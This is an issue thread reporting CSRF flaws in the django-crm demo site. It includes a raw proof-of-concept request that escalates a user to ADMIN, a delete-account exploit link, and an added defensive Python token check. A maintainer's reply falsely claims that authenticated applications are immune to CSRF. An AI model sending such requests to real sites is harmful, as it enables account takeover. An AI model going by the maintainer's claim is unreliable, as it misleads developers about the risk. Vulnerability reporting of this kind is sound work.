Comments (6)
User Edit Form has CSRF
Exploit Request:
POST /users/25/edit/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/25/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: csrftoken=zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ; sessionid=kta9sxfstfmi6mi2r4vankx5h1zuvvic
Connection: close
Upgrade-Insecure-Requests: 1
first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN
from django-crm.
CSRF while deleting account
Exploit link https://django-crm.micropyramid.com/accounts/123/delete/
There is no use if the CSRF token is present in the cookie.
The CSRF token should be present in the form or in a custom header as well, and the server side should validate that CSRF token before saving the form or deleting something.
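The check the reporter describes above (token carried in the form body or a custom header, verified server-side before the edit or delete is performed), as an added example that is not part of this thread or of django-crm's code. It is a stdlib-only synchronizer-token check run over raw HTTP requests: the session store, the `make_request` helper and the request variants are constructed for the example, and the cookie values are the ones from the request posted above.

```python
import hmac
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

# Cookie values copied from the request posted in the thread. The server-side
# store that binds a CSRF token to a session is hypothetical and constructed here.
SESSION_ID = "kta9sxfstfmi6mi2r4vankx5h1zuvvic"
TOKEN = "zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ"
SESSION_TOKENS = {SESSION_ID: TOKEN}

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}
FORM_FIELD = "csrfmiddlewaretoken"  # field name Django's {% csrf_token %} tag emits
HEADER = "x-csrftoken"              # Django's default token header, lower-cased


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def submitted_token(headers, body):
    """Token the page itself placed in a header or form field. The csrftoken
    cookie is deliberately ignored: the browser attaches it to a cross-site
    request just as it does to a same-site one, so it proves nothing."""
    if HEADER in headers:
        return headers[HEADER]
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get(FORM_FIELD, [None])[0]


def csrf_check(raw, session_tokens=SESSION_TOKENS):
    """Return (allowed, reason). Unsafe methods must carry a token that matches
    the one bound to the caller's session."""
    method, _path, headers, body = parse_request(raw)
    if method in SAFE_METHODS:
        return True, "safe method"  # so a safe-method handler must never change state
    cookies = SimpleCookie()
    cookies.load(headers.get("cookie", ""))
    session = cookies["sessionid"].value if "sessionid" in cookies else None
    expected = session_tokens.get(session)
    if expected is None:
        return False, "no authenticated session"
    token = submitted_token(headers, body)
    if token is None:
        return False, "no token in form or header"
    if not hmac.compare_digest(token, expected):
        return False, "token mismatch"
    return True, "token verified"


def make_request(method="POST", path="/users/25/edit/", form_token=None,
                 header_token=None, session=SESSION_ID):
    """Build variants of the posted request (constructed sample input)."""
    cookie = f"csrftoken={TOKEN}" + (f"; sessionid={session}" if session else "")
    headers = [
        "Host: django-crm.micropyramid.com",
        "Content-Type: application/x-www-form-urlencoded",
        f"Cookie: {cookie}",
    ]
    if header_token is not None:
        headers.append(f"X-CSRFToken: {header_token}")
    body = "first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN"
    if form_token is not None:
        body += f"&{FORM_FIELD}={form_token}"
    if method in SAFE_METHODS:
        body = ""
    return f"{method} {path} HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body


if __name__ == "__main__":
    print(csrf_check(make_request()))                    # (False, 'no token in form or header')
    print(csrf_check(make_request(form_token=TOKEN)))    # (True, 'token verified')
    print(csrf_check(make_request(header_token=TOKEN)))  # (True, 'token verified')
    print(csrf_check(make_request(form_token="x" * 64))) # (False, 'token mismatch')
    print(csrf_check(make_request("GET", "/accounts/123/delete/")))  # (True, 'safe method')
```

The request exactly as posted in the thread is rejected because its only token is the cookie; the same request with the token echoed in `csrfmiddlewaretoken` or `X-CSRFToken` passes. This example binds the token to the server-side session; Django's own `CsrfViewMiddleware` instead compares the submitted token with the `csrftoken` cookie (a double-submit check), which serves the same purpose because an attacker's page cannot read that cookie. The last call shows the limit of any such check: if the delete link reported above performs the deletion on a GET, a token check on unsafe methods never runs for it, so the delete must also be moved to POST before the check protects it.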
Reference : https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
@abuvanth thanks for your observation, and there is no chance of CSRF for auth-protected applications. CSRF is for something like contact forms which doesn't need to be authenticated to access.
Read "Am I Vulnerable To 'Cross-Site Request Forgery (CSRF)'?" section in the OWASP link provided by you.
There are very simple scripts we can execute in terminal to get CSRF token and send it back in no time.
Anyway, we will review and add or remove it completely to eliminate these confusions about security.
Thank you.